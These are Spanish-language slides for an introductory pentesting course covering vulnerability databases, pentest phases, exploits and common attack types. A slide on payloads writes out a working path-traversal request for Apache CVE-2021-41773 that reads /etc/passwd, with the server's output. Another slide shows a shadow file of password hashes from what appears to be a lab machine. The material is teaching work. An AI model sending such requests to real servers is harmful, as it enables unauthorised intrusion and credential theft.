Está en la página 1de 89

Curso de

Introducción al
Pentesting
Dani Carvajal - @Cisckoc
Contenido

● Introducción al Pentesting.
● Ciclo de vida del Pentesting.
● Introducción a los exploits.
● Técnicas de ataque misceláneos.
Habilidades
necesarias
Introducción al Pentesting
Habilidades necesarias

● Conocimientos básicos de redes informáticas.

● Conocimientos básicos de programación.

● Conocimientos básicos de bases de datos.

● Conocer el funcionamiento básico de los


navegadores y aplicaciones web.
Conocimientos básicos de
programación

White Box

Imput A C Output

B D E
Black Box Testing

Imput Output

Black Box
Conocimientos básicos de
bases de datos
CVE, Microsoft
Vuln Database

Bases de datos de
vulnerabilidades
Línea de tiempo de Eternal
Blue
CVE - Common
Vulnerabilities and Exposures

Siglas de Common Año de registro Número de cuatro


Vulnerabilities and cifras asignado a la
Exposures vulnerabilidad
CVE-2017-0144
CVE-2019-0708

Eternal Blue
Blue Keep
Tomado de: https://www.cve.org/ProgramOrganization/CNAs
Enumeración de
vulnerabilidades comunes

CWE - Common Weakness


Enumeration
Enumeración y
clasificación de patrones
de ataque comunes
CAPEC
Sistema de puntuación
de vulnerabilidades
comunes
CVSS - Common Vulnerability
Scoring System
Seguridad
por oscuridad

Introducción al Pentesting
El diseño de un sistema no
debería requerir el secreto, y el
compromiso del sistema no
debería incomodar a los
corresponsales.

Auguste Kerckhoffs
Obtención de
inteligencia

Ciclo de vida del Pentesting


Objetivos

● La inteligencia se ocupa de obtener y analizar


la información para identificar y predecir
amenazas.
● Llevar a cabo toma de decisiones de manera
inteligente.
Subfases

● Recolección de inteligencia pasiva.


● Recolección de inteligencia semipasiva.
● Recolección de inteligencia activa.
Recolección de inteligencia
pasiva
Recolección de inteligencia
semipasiva
Recolección de inteligencia
activa
Análisis de
vulnerabilidades

Ciclo de vida del Pentesting


Objetivos

● Identificar las deficiencias de seguridad en un


sistema informático.
● Definir el alcance probable de las amenazas.
Escáner de vulnerabilidades
Escáner de vulnerabilidades
Escáner de vulnerabilidades
Técnicas de ataque y
explotación de
vulnerabilidades
Ciclo de vida del Pentesting
Objetivos

● Definir los vectores de ataque con base en la


inteligencia recabada y a las vulnerabilidades
identificadas.
● Verificar la existencia y explotabilidad de las
vulnerabilidades.
Vectores de ataque

● Vulnerabilidades en tecnologías.
● Ataques misceláneos.
● Ingeniería social.
● Acceso físico.
Vulnerabilidades en
tecnologías
Vulnerabilidad en WinRAR
Ataques misceláneos
Ingeniería social
Ataques de fuerza bruta
Ataque físico
Es un truco que he descubierto que
funciona muy a menudo. Si pides
información confidencial, la gente,
naturalmente, sospecha de inmediato.
Si finges que ya tienes esa información
y dices algo que está mal, la gente
suele corregirte y te recompensa con la
información que estabas buscando.

Kevin Mitnick
Post-explotación

Ciclo de vida del Pentesting


Objetivos

● Identificar Vulnerabilidades locales.


● Obtener privilegios de sistema.
● Identificar el alcance probado de una
amenaza.
● Obtener información.
● Escalar a otros sistemas.
Comprometes una red
informática
Te encuentras en una red
Siguiente Hop (Gateway)
Desarrollo
de informes

Ciclo de vida del


Pentesting
Objetivos

● Documentar los hallazgos de fuga de


información.
● Documentar las vulnerabilidades encontradas.
● Establecer la urgencia de resolución de
vulnerabilidades.
● Identificar el alcance de un ataque al no
solucionar los hallazgos mencionados.
Informe ejecutivo
Informe técnico
Informe técnico
Vulnerabilidades
de tipo 0-Day
Introducción a los exploits
¿Qué son los exploits
y los payloads?
Introducción a los exploits
¿Qué es un exploit?
¿Qué es un payload?
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
HTTP/1.1
Host: https://www.twitter.com/vulnmachines
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;
x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.
9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

CVE-2021-41773
HTTP/1.1 200 OK
DATE: Tue, 05 Oct 2021 14:51:37 GMT
Server: Apache/2.4.49 (Unix) OpenSSL/1.0.2k-fips
Last-Modified: Fri, 18 Jun 2021 09:31:30 GMT
ETag: “820-5c506fd229535”
Accept-Ranges: bytes
Content-Length: 2080
Vary: User-Agent
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System
Bases de datos de exploits

Introducción a los exploits


Tipos de exploits

Introducción a los exploits


Ataques de
fuerza bruta
Técnicas de ataque misceláneos
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
Ataques de denegación
de servicio
Técnicas de ataque misceláneos
Ataques de denegación
de servicio
● ICMP (Ping) Flood.
● SYN Flood.
● Ping of Death.
● HTTP Flood.
● Zero-day DDoS Attacks.
● Volume Based Attacks.
Spoofing

Técnicas de ataque
misceláneos
Fuzzing

Técnicas de ataque
misceláneos
URL Fuzzing
URL Fuzzing
Software fuzzing
Técnicas de
ataques físicos
Técnicas de ataque
misceláneos
Tomado de: https://www.techtarget.com/searchsecurity/definition/dumpster-diving
Infiltrarse en cuarto de
servidores
USB DROP
Instalación
Kali Linux
Kali Linux en VMware

También podría gustarte